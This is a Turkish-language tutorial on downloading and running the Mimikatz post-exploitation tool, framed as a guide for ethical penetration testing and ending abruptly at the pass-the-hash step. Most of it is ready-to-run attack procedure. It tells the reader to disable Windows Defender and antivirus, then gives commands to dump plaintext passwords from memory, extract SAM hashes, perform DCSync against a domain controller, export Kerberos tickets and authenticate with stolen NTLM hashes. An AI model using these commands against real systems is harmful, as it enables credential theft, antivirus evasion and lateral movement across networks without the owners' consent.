Giriş

Mimikatz, bellekten düz metin şifreler, hash’ler, PIN kodları ve Kerberos biletleri çıkarmak için tasarlanmış güçlü bir post-exploitation aracıdır. Sistem güvenlik açıklarını değerlendirmek için penetrasyon test uzmanları ve güvenlik profesyonelleri tarafından yaygın olarak kullanılmaktadır. Bu kılavuz, etik güvenlik testleri için Mimikatz’ı kurma ve kullanma konusunda adım adım bir yaklaşım sunmaktadır.

Uyarı: Mimikatz’ın yetkisiz kullanımı yasadışıdır. Herhangi bir ortamda kullanmadan önce izin aldığınızdan emin olun.

Ön Koşullar

Mimikatz’ı kurmadan önce, aşağıdakilere sahip olduğunuzdan emin olun:

  • Bir Windows makinesi (Windows 7, 10, 11 veya Sunucu sürümleri)
  • Yönetici ayrıcalıkları
  • Windows Defender ve herhangi bir antivirüs yazılımı devre dışı (Mimikatz genellikle kötü amaçlı yazılım olarak işaretlenir)

Mimikatz İndirme

Mimikatz, GitHub’da bulunan açık kaynaklı bir araçtır. İndirmek için:

  1. Bir web tarayıcısı açın ve https://github.com/gentilkiwi/mimikatz adresine gidin.
  2. Kod > ZIP İndir seçeneğine tıklayın.
  3. ZIP dosyasını istediğiniz bir klasöre çıkarın.

Alternatif olarak, Git kullanarak depoyu klonlayabilirsiniz:

 git clone https://github.com/gentilkiwi/mimikatz.git

Mimikatz’ı Çalıştırma

Mimikatz yönetici ayrıcalıkları gerektirdiğinden, çalıştırmak için bu adımları izleyin:

  1. Komut İstemi veya PowerShelli Yönetici olarak açın.
  2. Mimikatz’ı çıkardığınız klasöre gidin:
    cd pathtomimikatzx64
  3. Mimikatz’ı çalıştırın:
    mimikatz.exe
  4. mimikatz # istemi ile bir komut satırı arayüzü görmelisiniz.

Temel Mimikatz Komutları

1. Sistem Ayrıcalıklarını Kontrol Etme

Kimlik bilgilerini çıkarmadan önce yeterli ayrıcalıklara sahip olduğunuzu doğrulayın:

privilege::debug

Başarılı olursa, şunu görmelisiniz: Privilege '20' OK

2. Bellekten Şifreleri Çıkarma

Bellekten düz metin şifreleri dökmek için:

sekurlsa::logonpasswords

Bu, mevcutsa kullanıcı adı, alan ve şifreleri düz metin olarak gösterecektir.

3. NTLM Hash’lerini Dökme

NTLM hash’leri pass-the-hash saldırıları için kullanılabilir. Bunları çıkarmak için çalıştırın:

lsadump::sam

Veya, uzaktan sistemler için:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Kerberos Bileti Çıkarma

Sistemden Kerberos biletlerini almak için:

sekurlsa::tickets /export

Bu, pass-the-ticket saldırılarında kullanılabilecek .kirbi dosyalarını dışa aktarır.

5. Pass-the-Hash Saldırısı

Bir şifre yerine NTLM hash’i ile kimlik doğrulamak için:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>